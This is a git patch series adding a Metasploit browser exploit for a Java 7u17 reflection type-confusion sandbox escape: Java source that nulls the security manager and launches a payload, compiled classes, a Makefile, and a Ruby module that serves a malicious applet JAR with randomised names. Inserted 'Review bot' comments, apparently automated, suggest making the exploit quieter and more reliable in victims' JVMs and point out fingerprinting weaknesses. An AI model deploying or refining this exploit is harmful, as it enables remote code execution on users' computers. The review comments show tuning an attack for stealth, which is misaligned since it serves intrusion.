From 19f2e72dbb64b5687af84d0dbc2a38aa48029db3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 18 Apr 2013 16:10:11 -0500 Subject: [PATCH 1/4] Added module for Java 7u17 sandboxy bypass --- data/exploits/jre7u17/Exploit.class | Bin 0 -> 1805 bytes data/exploits/jre7u17/SystemClass.class | Bin 0 -> 624 bytes data/exploits/jre7u17/Union1.class | Bin 0 -> 246 bytes data/exploits/jre7u17/Union2.class | Bin 0 -> 241 bytes external/source/jre7u17/Exploit.java | 75 ++++++++++ .../browser/java_jre17_reflection_types.rb | 133 ++++++++++++++++++ 6 files changed, 208 insertions(+) create mode 100755 data/exploits/jre7u17/Exploit.class create mode 100755 data/exploits/jre7u17/SystemClass.class create mode 100755 data/exploits/jre7u17/Union1.class create mode 100755 data/exploits/jre7u17/Union2.class create mode 100755 external/source/jre7u17/Exploit.java create mode 100644 modules/exploits/multi/browser/java_jre17_reflection_types.rb 
diff --git a/data/exploits/jre7u17/Exploit.class b/data/exploits/jre7u17/Exploit.class new file mode 100755 index 0000000000000000000000000000000000000000..a1d3f5c1e915949f20aedbdb268e43730e4cd831 GIT binary patch literal 1805 zcma)7Yf}?f7=8|foMc(9v1qhVv0TD6T*TIZTFOPyfYbmj+S`(xz{0YdNj4Uyzo0*$ zzo0Yai~XRZ$kdsRpZ!s7pWOtrRHyCC&N=V(d7ty1%f9*Z_dftk!qL!$F%9FGkeH0% zs>GCrYxqRsQ;F*lq%<^OT4E*&i5pSW z*s^Hp$eATi%BXC)Xu5~XhHY%CqCiu|HL`olM!^r1_(I|V7eVqQEubwNWL3d69lJzy zuU4f#JsGE5%&JAxgVz@h3YKHKqr1jqL&rzBERoT%hA#zLJzLT;?Cs>dQ})?});3oc zNVDddvy4(n;wv4Scqq_T^DNn}@|lL$ZPFO$n)9Zza^pH4;cIHXc|ylkd_(#=zQuQE zie?T=uG-h}Jq)f*#}=|Wa!{TnFR`s-2jpyGSI3?weeAKfbnL?xh}D?9ZN(Yu+D_5= zq0(eo?SeqNpJfyZmU5G`{v^;@gEH;M&YnsxD|g4q-7)N(*TnNRe^KQvm35Pg-bw|! zYM%FGa%aMpAFDv{XX=gBmHdZYy_QWi6wqa@C%U1WQ$sgFt6mNQkxokxE&C z#!5FA4vefTa4v{gWyU*IIc^i&)BwW$tzGU9Ve83Epf8wO^##e)!b@Iw|9isU1@|s= zQ@V0|-!cxUES{gZPF|$&&b{tDv*G`6d%W|LV@%ywu2J%@ZgSN)v>bz{Ewpc#Joz1o zM*&W!9o|4UpQ0|le&Ay!ysOT!n_4$#!MS1ZCB#z-0#`U{sN;AEA$-WUj(3YX!^IRW z5qf?*L0t^>?V%VNjuF1+tMXJ$#}H|c9z$D>q0tvsoI}{IbjLYZv;5j-@aQ;`c_?mcu zjw4*GdM@}L{nT^8TUMRFtQEv4Uq%ZT(?v@^mo|nTOraMk^kJ5kB_!|w19*r*WHAH> z!zg0}KVlR=A&H-v@eBVQPngw1v@59li^hmVumAN)@ay-#gd`9;hy*rHu$h90r@c3* zd2MbzL0p{R;t?Y0BZSgVeXHaqT%uQ^nRyldUDSXX?%^#;i;S4%Z)cGa^IX$ypHCy| b?@A2MNpfb|C==>PdxNvag4alW9r3>bnq#Ec literal 0 HcmV?d00001 
diff --git a/data/exploits/jre7u17/SystemClass.class b/data/exploits/jre7u17/SystemClass.class new file mode 100755 index 0000000000000000000000000000000000000000..1322475ea9c1b69ff33413be6e5bd410db877e11 GIT binary patch literal 624 zcmZ9I$xZ@66h&__DxeI`1Bx@C5h)y_aYJ-Pbb)c-U}KszV4yMjS*}c6_yK;D@mA%n zT=Y4ws&gu-`uY9(22jI60%4TmD95p{5b9JFa*eL@>QsEE|6I9mb=`JwY5r(~n!&Nb ziNUGCnZdcig+jPfJ+kCMoEed!J)Z! z3R~D#NH*U`f!nM5&S<2N`Trm&AjEeA*7!vbC4rbYE}jriiWB0bI3=DEPm9yyj5sUK ziD$&K;yLlWctN}`yu5$Z;xK!ed!UEIfdR5>tuAd^7() znalh0d;#d7YU~QGun-+n_f6*r7C-Ykv$-_X4Fzj-pr;LjFgk-h0BBTbv zMiPn>W#sgH@a1VCe9ewC56-8x9I05i!|PE8Dr)S-MYzZy%Zrvq1%@wpvDwtZ?3y!w tFV_(&NbqA|0x6`KfCZaL96Zh0;i}9zcGC3+=>BWxnAXp9nJ%jY@?SnsD_sBp literal 0 HcmV?d00001 diff --git a/external/source/jre7u17/Exploit.java b/external/source/jre7u17/Exploit.java new file mode 100755 index 0000000000..91951ddd11 --- /dev/null +++ b/external/source/jre7u17/Exploit.java 
@@ -0,0 +1,75 @@
+//Original PoC from Jeroen Frijters @Jeroen Frijters
+
+import java.lang.invoke.MethodHandle;
+import java.lang.reflect.Field;
+import static java.lang.invoke.MethodHandles.lookup;
+import java.applet.Applet;
+import metasploit.Payload;
+
+class Union1 {
+ int field1;
+ Object field2;
+}
+
+class Union2 {
+ int field1;
+ SystemClass field2;
+}
+
+class SystemClass {
+ Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
+ f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
+ f24,f25,f26,f27,f28,f29,f30;
+}
+
+public class Exploit extends Applet
+{
+
+ public Exploit()
+ {
+ }
+
+ static void disableSecurityManager() throws Throwable {
+ MethodHandle mh1, mh2;
+ mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
+ mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
+ Field fld1 = Union1.class.getDeclaredField("field1");
+ Field fld2 = Union2.class.getDeclaredField("field1");
+ Class classInt = int.class;
+ Class classDouble = double.class;
+ mh1.invokeExact(int.class);
+ mh2.invokeExact((Class)null);
+ Union1 u1 = new Union1();
+ u1.field2 = System.class;
+ Union2 u2 = new Union2();
+ fld2.set(u2, fld1.get(u1));
+ mh1.invokeExact(classDouble);
+ mh2.invokeExact(classInt);
+ if (u2.field2.f29 == System.getSecurityManager()) {
+ u2.field2.f29 = null;
+ } else if (u2.field2.f30 == System.getSecurityManager()) {
+ u2.field2.f30 = null;
+ } else {
+ //System.out.println("security manager field not found");
+ }
+ }
+
+ public void init()
+ {
+ try
+ {
+ //System.out.println(System.getSecurityManager());
+ disableSecurityManager();
+ //System.out.println(System.getSecurityManager());
+ //Runtime.getRuntime().exec("calc.exe");
+ Payload.main(null);
+ }
+ catch(Exception exception)
+ {
+ //exception.printStackTrace();
+ } catch(Throwable t) {
+ //t.printStackTrace();
+ }
+ }
+
+}
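Review bot: The static `TYPE` swap in `disableSecurityManager` is never undone if `fld2.set(u2, fld1.get(u1))` throws, because the two restoring `invokeExact` calls follow it with no `finally`; on a JRE where the confused set fails the applet leaves `Double.TYPE == int.class` and `Integer.TYPE == null` in the victim JVM, which breaks reflection and boxing for the rest of the process and is a very loud artefact for a sandbox-escape payload. Put the restore in a `finally` so the primitive types are back before anything else runs, as sketched below. The `f29`/`f30` probe also deserves a comment such as `// slot of System's security-manager field for the targeted JREs; layout assumption, not an API` and a note that the silent `else` branch leaves the manager in place while `init()` still calls `Payload.main(null)` inside the sandbox. `init()` catches both `Exception` and `Throwable` and discards them, so a failed bypass is indistinguishable from a successful one from the applet side; at minimum a comment should say this is deliberate to keep the browser console quiet.
```java
static void disableSecurityManager() throws Throwable {
    // … unchanged: MethodHandle and Field lookups, classInt/classDouble …
    mh1.invokeExact(int.class);
    mh2.invokeExact((Class)null);
    Union2 u2;
    try {
        Union1 u1 = new Union1();
        u1.field2 = System.class;
        u2 = new Union2();
        fld2.set(u2, fld1.get(u1));
    } finally {
        // restore the primitive TYPE fields even if the confused set fails,
        // otherwise the host JVM is left with corrupted Double/Integer.TYPE
        mh1.invokeExact(classDouble);
        mh2.invokeExact(classInt);
    }
    // … unchanged: f29/f30 security-manager probe …
}
```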
diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb new file mode 100644 index 0000000000..749101d747 --- /dev/null +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb 
@@ -0,0 +1,133 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::EXE
+
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({ :javascript => false })
+
+ def initialize( info = {} )
+
+ super( update_info( info,
+ 'Name' => 'Java Applet Reflection Type Confusion Remote Code Execution',
+ 'Description' => %q{
+ This module abuses Java Reflection to generate a Type Confusion and run code
+ outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier.
+ This exploit doesn't bypass click-to-play, so the user must accept the java warning
+ in order to run the malicious applet.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Jeroen Frijters', # Vulnerability discovery and PoC
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ]
+ ],
+ 'Platform' => [ 'java', 'win', 'osx', 'linux' ],
+ 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+ 'Targets' =>
+ [
+ [ 'Generic (Java Payload)',
+ {
+ 'Platform' => ['java'],
+ 'Arch' => ARCH_JAVA,
+ }
+ ],
+ [ 'Windows x86 (Native Payload)',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Mac OS X x86 (Native Payload)',
+ {
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Linux x86 (Native Payload)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jan 10 2013'
+ ))
+ end
+
+
+ def setup
+ path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Exploit.class")
+ @exploit_class = 
File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+ path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union1.class")
+ @union1_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+ path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "Union2.class")
+ @union2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+ path = File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", "SystemClass.class")
+ @system_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+ @exploit_class_name = rand_text_alpha("Exploit".length)
+ @exploit_class.gsub!("Exploit", @exploit_class_name)
+ super
+ end
+
+ def on_request_uri(cli, request)
+ print_status("handling request for #{request.uri}")
+
+ case request.uri
+ when /\.jar$/i
+ jar = payload.encoded_jar
+ jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+ jar.add_file("Union1.class", @union1_class)
+ jar.add_file("Union2.class", @union2_class)
+ jar.add_file("SystemClass.class", @system_class)
+ metasploit_str = rand_text_alpha("metasploit".length)
+ payload_str = rand_text_alpha("payload".length)
+ jar.entries.each { |entry|
+ entry.name.gsub!("metasploit", metasploit_str)
+ entry.name.gsub!("Payload", payload_str)
+ entry.data = entry.data.gsub("metasploit", metasploit_str)
+ entry.data = entry.data.gsub("Payload", payload_str)
+ }
+ jar.build_manifest
+
+ send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+ when /\/$/
+ payload = regenerate_payload(cli)
+ if not payload
+ print_error("Failed to generate the payload.")
+ send_not_found(cli)
+ return
+ end
+ send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+ else
+ send_redirect(cli, get_resource() + '/', '')
+ end
+
+ end
+
+ def generate_html
+ html = %Q|Loading, Please Wait...|
+ html += %Q|

Loading, Please Wait...

| + html += %Q|| + html += %Q|| + return html + end + +end From b99fc06b6fd5b191d7eb99e0ae476b4dcf54d9f0 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 18 Apr 2013 21:20:35 -0500 Subject: [PATCH 2/4] description updated --- .../multi/browser/java_jre17_reflection_types.rb | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb index 749101d747..61197e0fd5 100644 --- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb @@ -22,10 +22,11 @@ class Metasploit3 < Msf::Exploit::Remote super( update_info( info, 'Name' => 'Java Applet Reflection Type Confusion Remote Code Execution', 'Description' => %q{ - This module abuses Java Reflection to generate a Type Confusion and run code - outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. - This exploit doesn't bypass click-to-play, so the user must accept the java warning - in order to run the malicious applet. + This module abuses Java Reflection to generate a Type Confusion, due to a weak + access control when setting final fields on static classes, and run code outside of + the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This + exploit doesn't bypass click-to-play, so the user must accept the java warning in + order to run the malicious applet. }, 'License' => MSF_LICENSE, 'Author' => From 9fca89f70b0bd5aaedc41b6e21ed72db4d99b490 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 18 Apr 2013 23:05:49 -0500 Subject: [PATCH 3/4] fix small issues --- .../{jre7u17 => exploits/jre17u17}/Exploit.java | 0 external/source/exploits/jre17u17/Makefile | 17 +++++++++++++++++ 2 files changed, 17 insertions(+) rename external/source/{jre7u17 => exploits/jre17u17}/Exploit.java (100%) create mode 100644 external/source/exploits/jre17u17/Makefile 
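Review bot: The module description in `initialize` says the bug affects "Java version 7u17 and earlier", which reads as covering Java 6 too, but the applet shipped in this same series depends on `java.lang.invoke.MethodHandles`, which only exists from Java 7; tighten it to `The vulnerability affects Java 7 up to and including Update 17.` (the fixed update presumably comes from the referenced April 2013 CPU — verify before naming it). In `setup`, `@exploit_class.gsub!("Exploit", @exploit_class_name)` byte-patches a compiled class file and only works because `rand_text_alpha("Exploit".length)` produces a same-length name, so the length-prefixed constant-pool entries stay valid; add `# same-length substitution only: keeps the class-file constant pool consistent` above it, since the next person to "shorten" the random name will produce a corrupt class. The same same-length trick is used for `metasploit`/`Payload` in the `jar.entries.each` block and deserves the same comment. Note also that `Union1.class`, `Union2.class` and `SystemClass.class` keep their fixed names in the served JAR, so the randomisation of the main class name gains little against content-based fingerprinting.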
diff --git a/external/source/jre7u17/Exploit.java b/external/source/exploits/jre17u17/Exploit.java similarity index 100% rename from external/source/jre7u17/Exploit.java rename to external/source/exploits/jre17u17/Exploit.java diff --git a/external/source/exploits/jre17u17/Makefile b/external/source/exploits/jre17u17/Makefile new file mode 100644 index 0000000000..5e8a0e26a8 --- /dev/null +++ b/external/source/exploits/jre17u17/Makefile @@ -0,0 +1,17 @@ +CLASSES = \ + Exploit.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java + +all: $(CLASSES:.java=.class) + +install: + mv Exploit.class ../../../../data/exploits/jre17u17/Exploit.class + mv SystemClass.class ../../../../data/exploits/jre17u17/SystemClass.class + mv Union1.class ../../../../data/exploits/jre17u17/Union1.class + mv Union2.class ../../../../data/exploits/jre17u17/Union2.class + +clean: + rm -rf *.class From 1365dfe68cb780e2eb7847cddccea175e03dbdc7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 19 Apr 2013 07:49:12 -0500 Subject: [PATCH 4/4] Add Oracle url --- modules/exploits/multi/browser/java_jre17_reflection_types.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb index 61197e0fd5..43fb4ff512 100644 --- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb 
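Review bot: The `install` target moves the four compiled classes into `data/exploits/jre17u17/`, but the module added earlier in this series builds its load path as `File.join(Msf::Config.install_root, "data", "exploits", "jre7u17", ...)` and the committed `.class` files also live under `data/exploits/jre7u17/`, so `make install` either fails on the missing directory or drops the classes where the module never reads them; `jre17u17` also looks like a typo for `jre7u17`. Change `jre17u17` to `jre7u17` in the four `mv` lines (or rename the data directory and update the module in the same commit). Separately, the rule compiles with `javac -source 1.2 -target 1.2` a source that imports `java.lang.invoke.MethodHandle` and calls the signature-polymorphic `invokeExact`; I would expect `-source 1.2` to reject or mis-resolve that call, so confirm this Makefile actually reproduces the committed class files and otherwise use `-source 1.7 -target 1.7`, which costs nothing because the exploit only runs on Java 7.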
@@ -36,7 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'References' =>
 [
- [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ]
+ [ 'URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0' ],
+ [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html' ]
 ],
 'Platform' => [ 'java', 'win', 'osx', 'linux' ],
 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },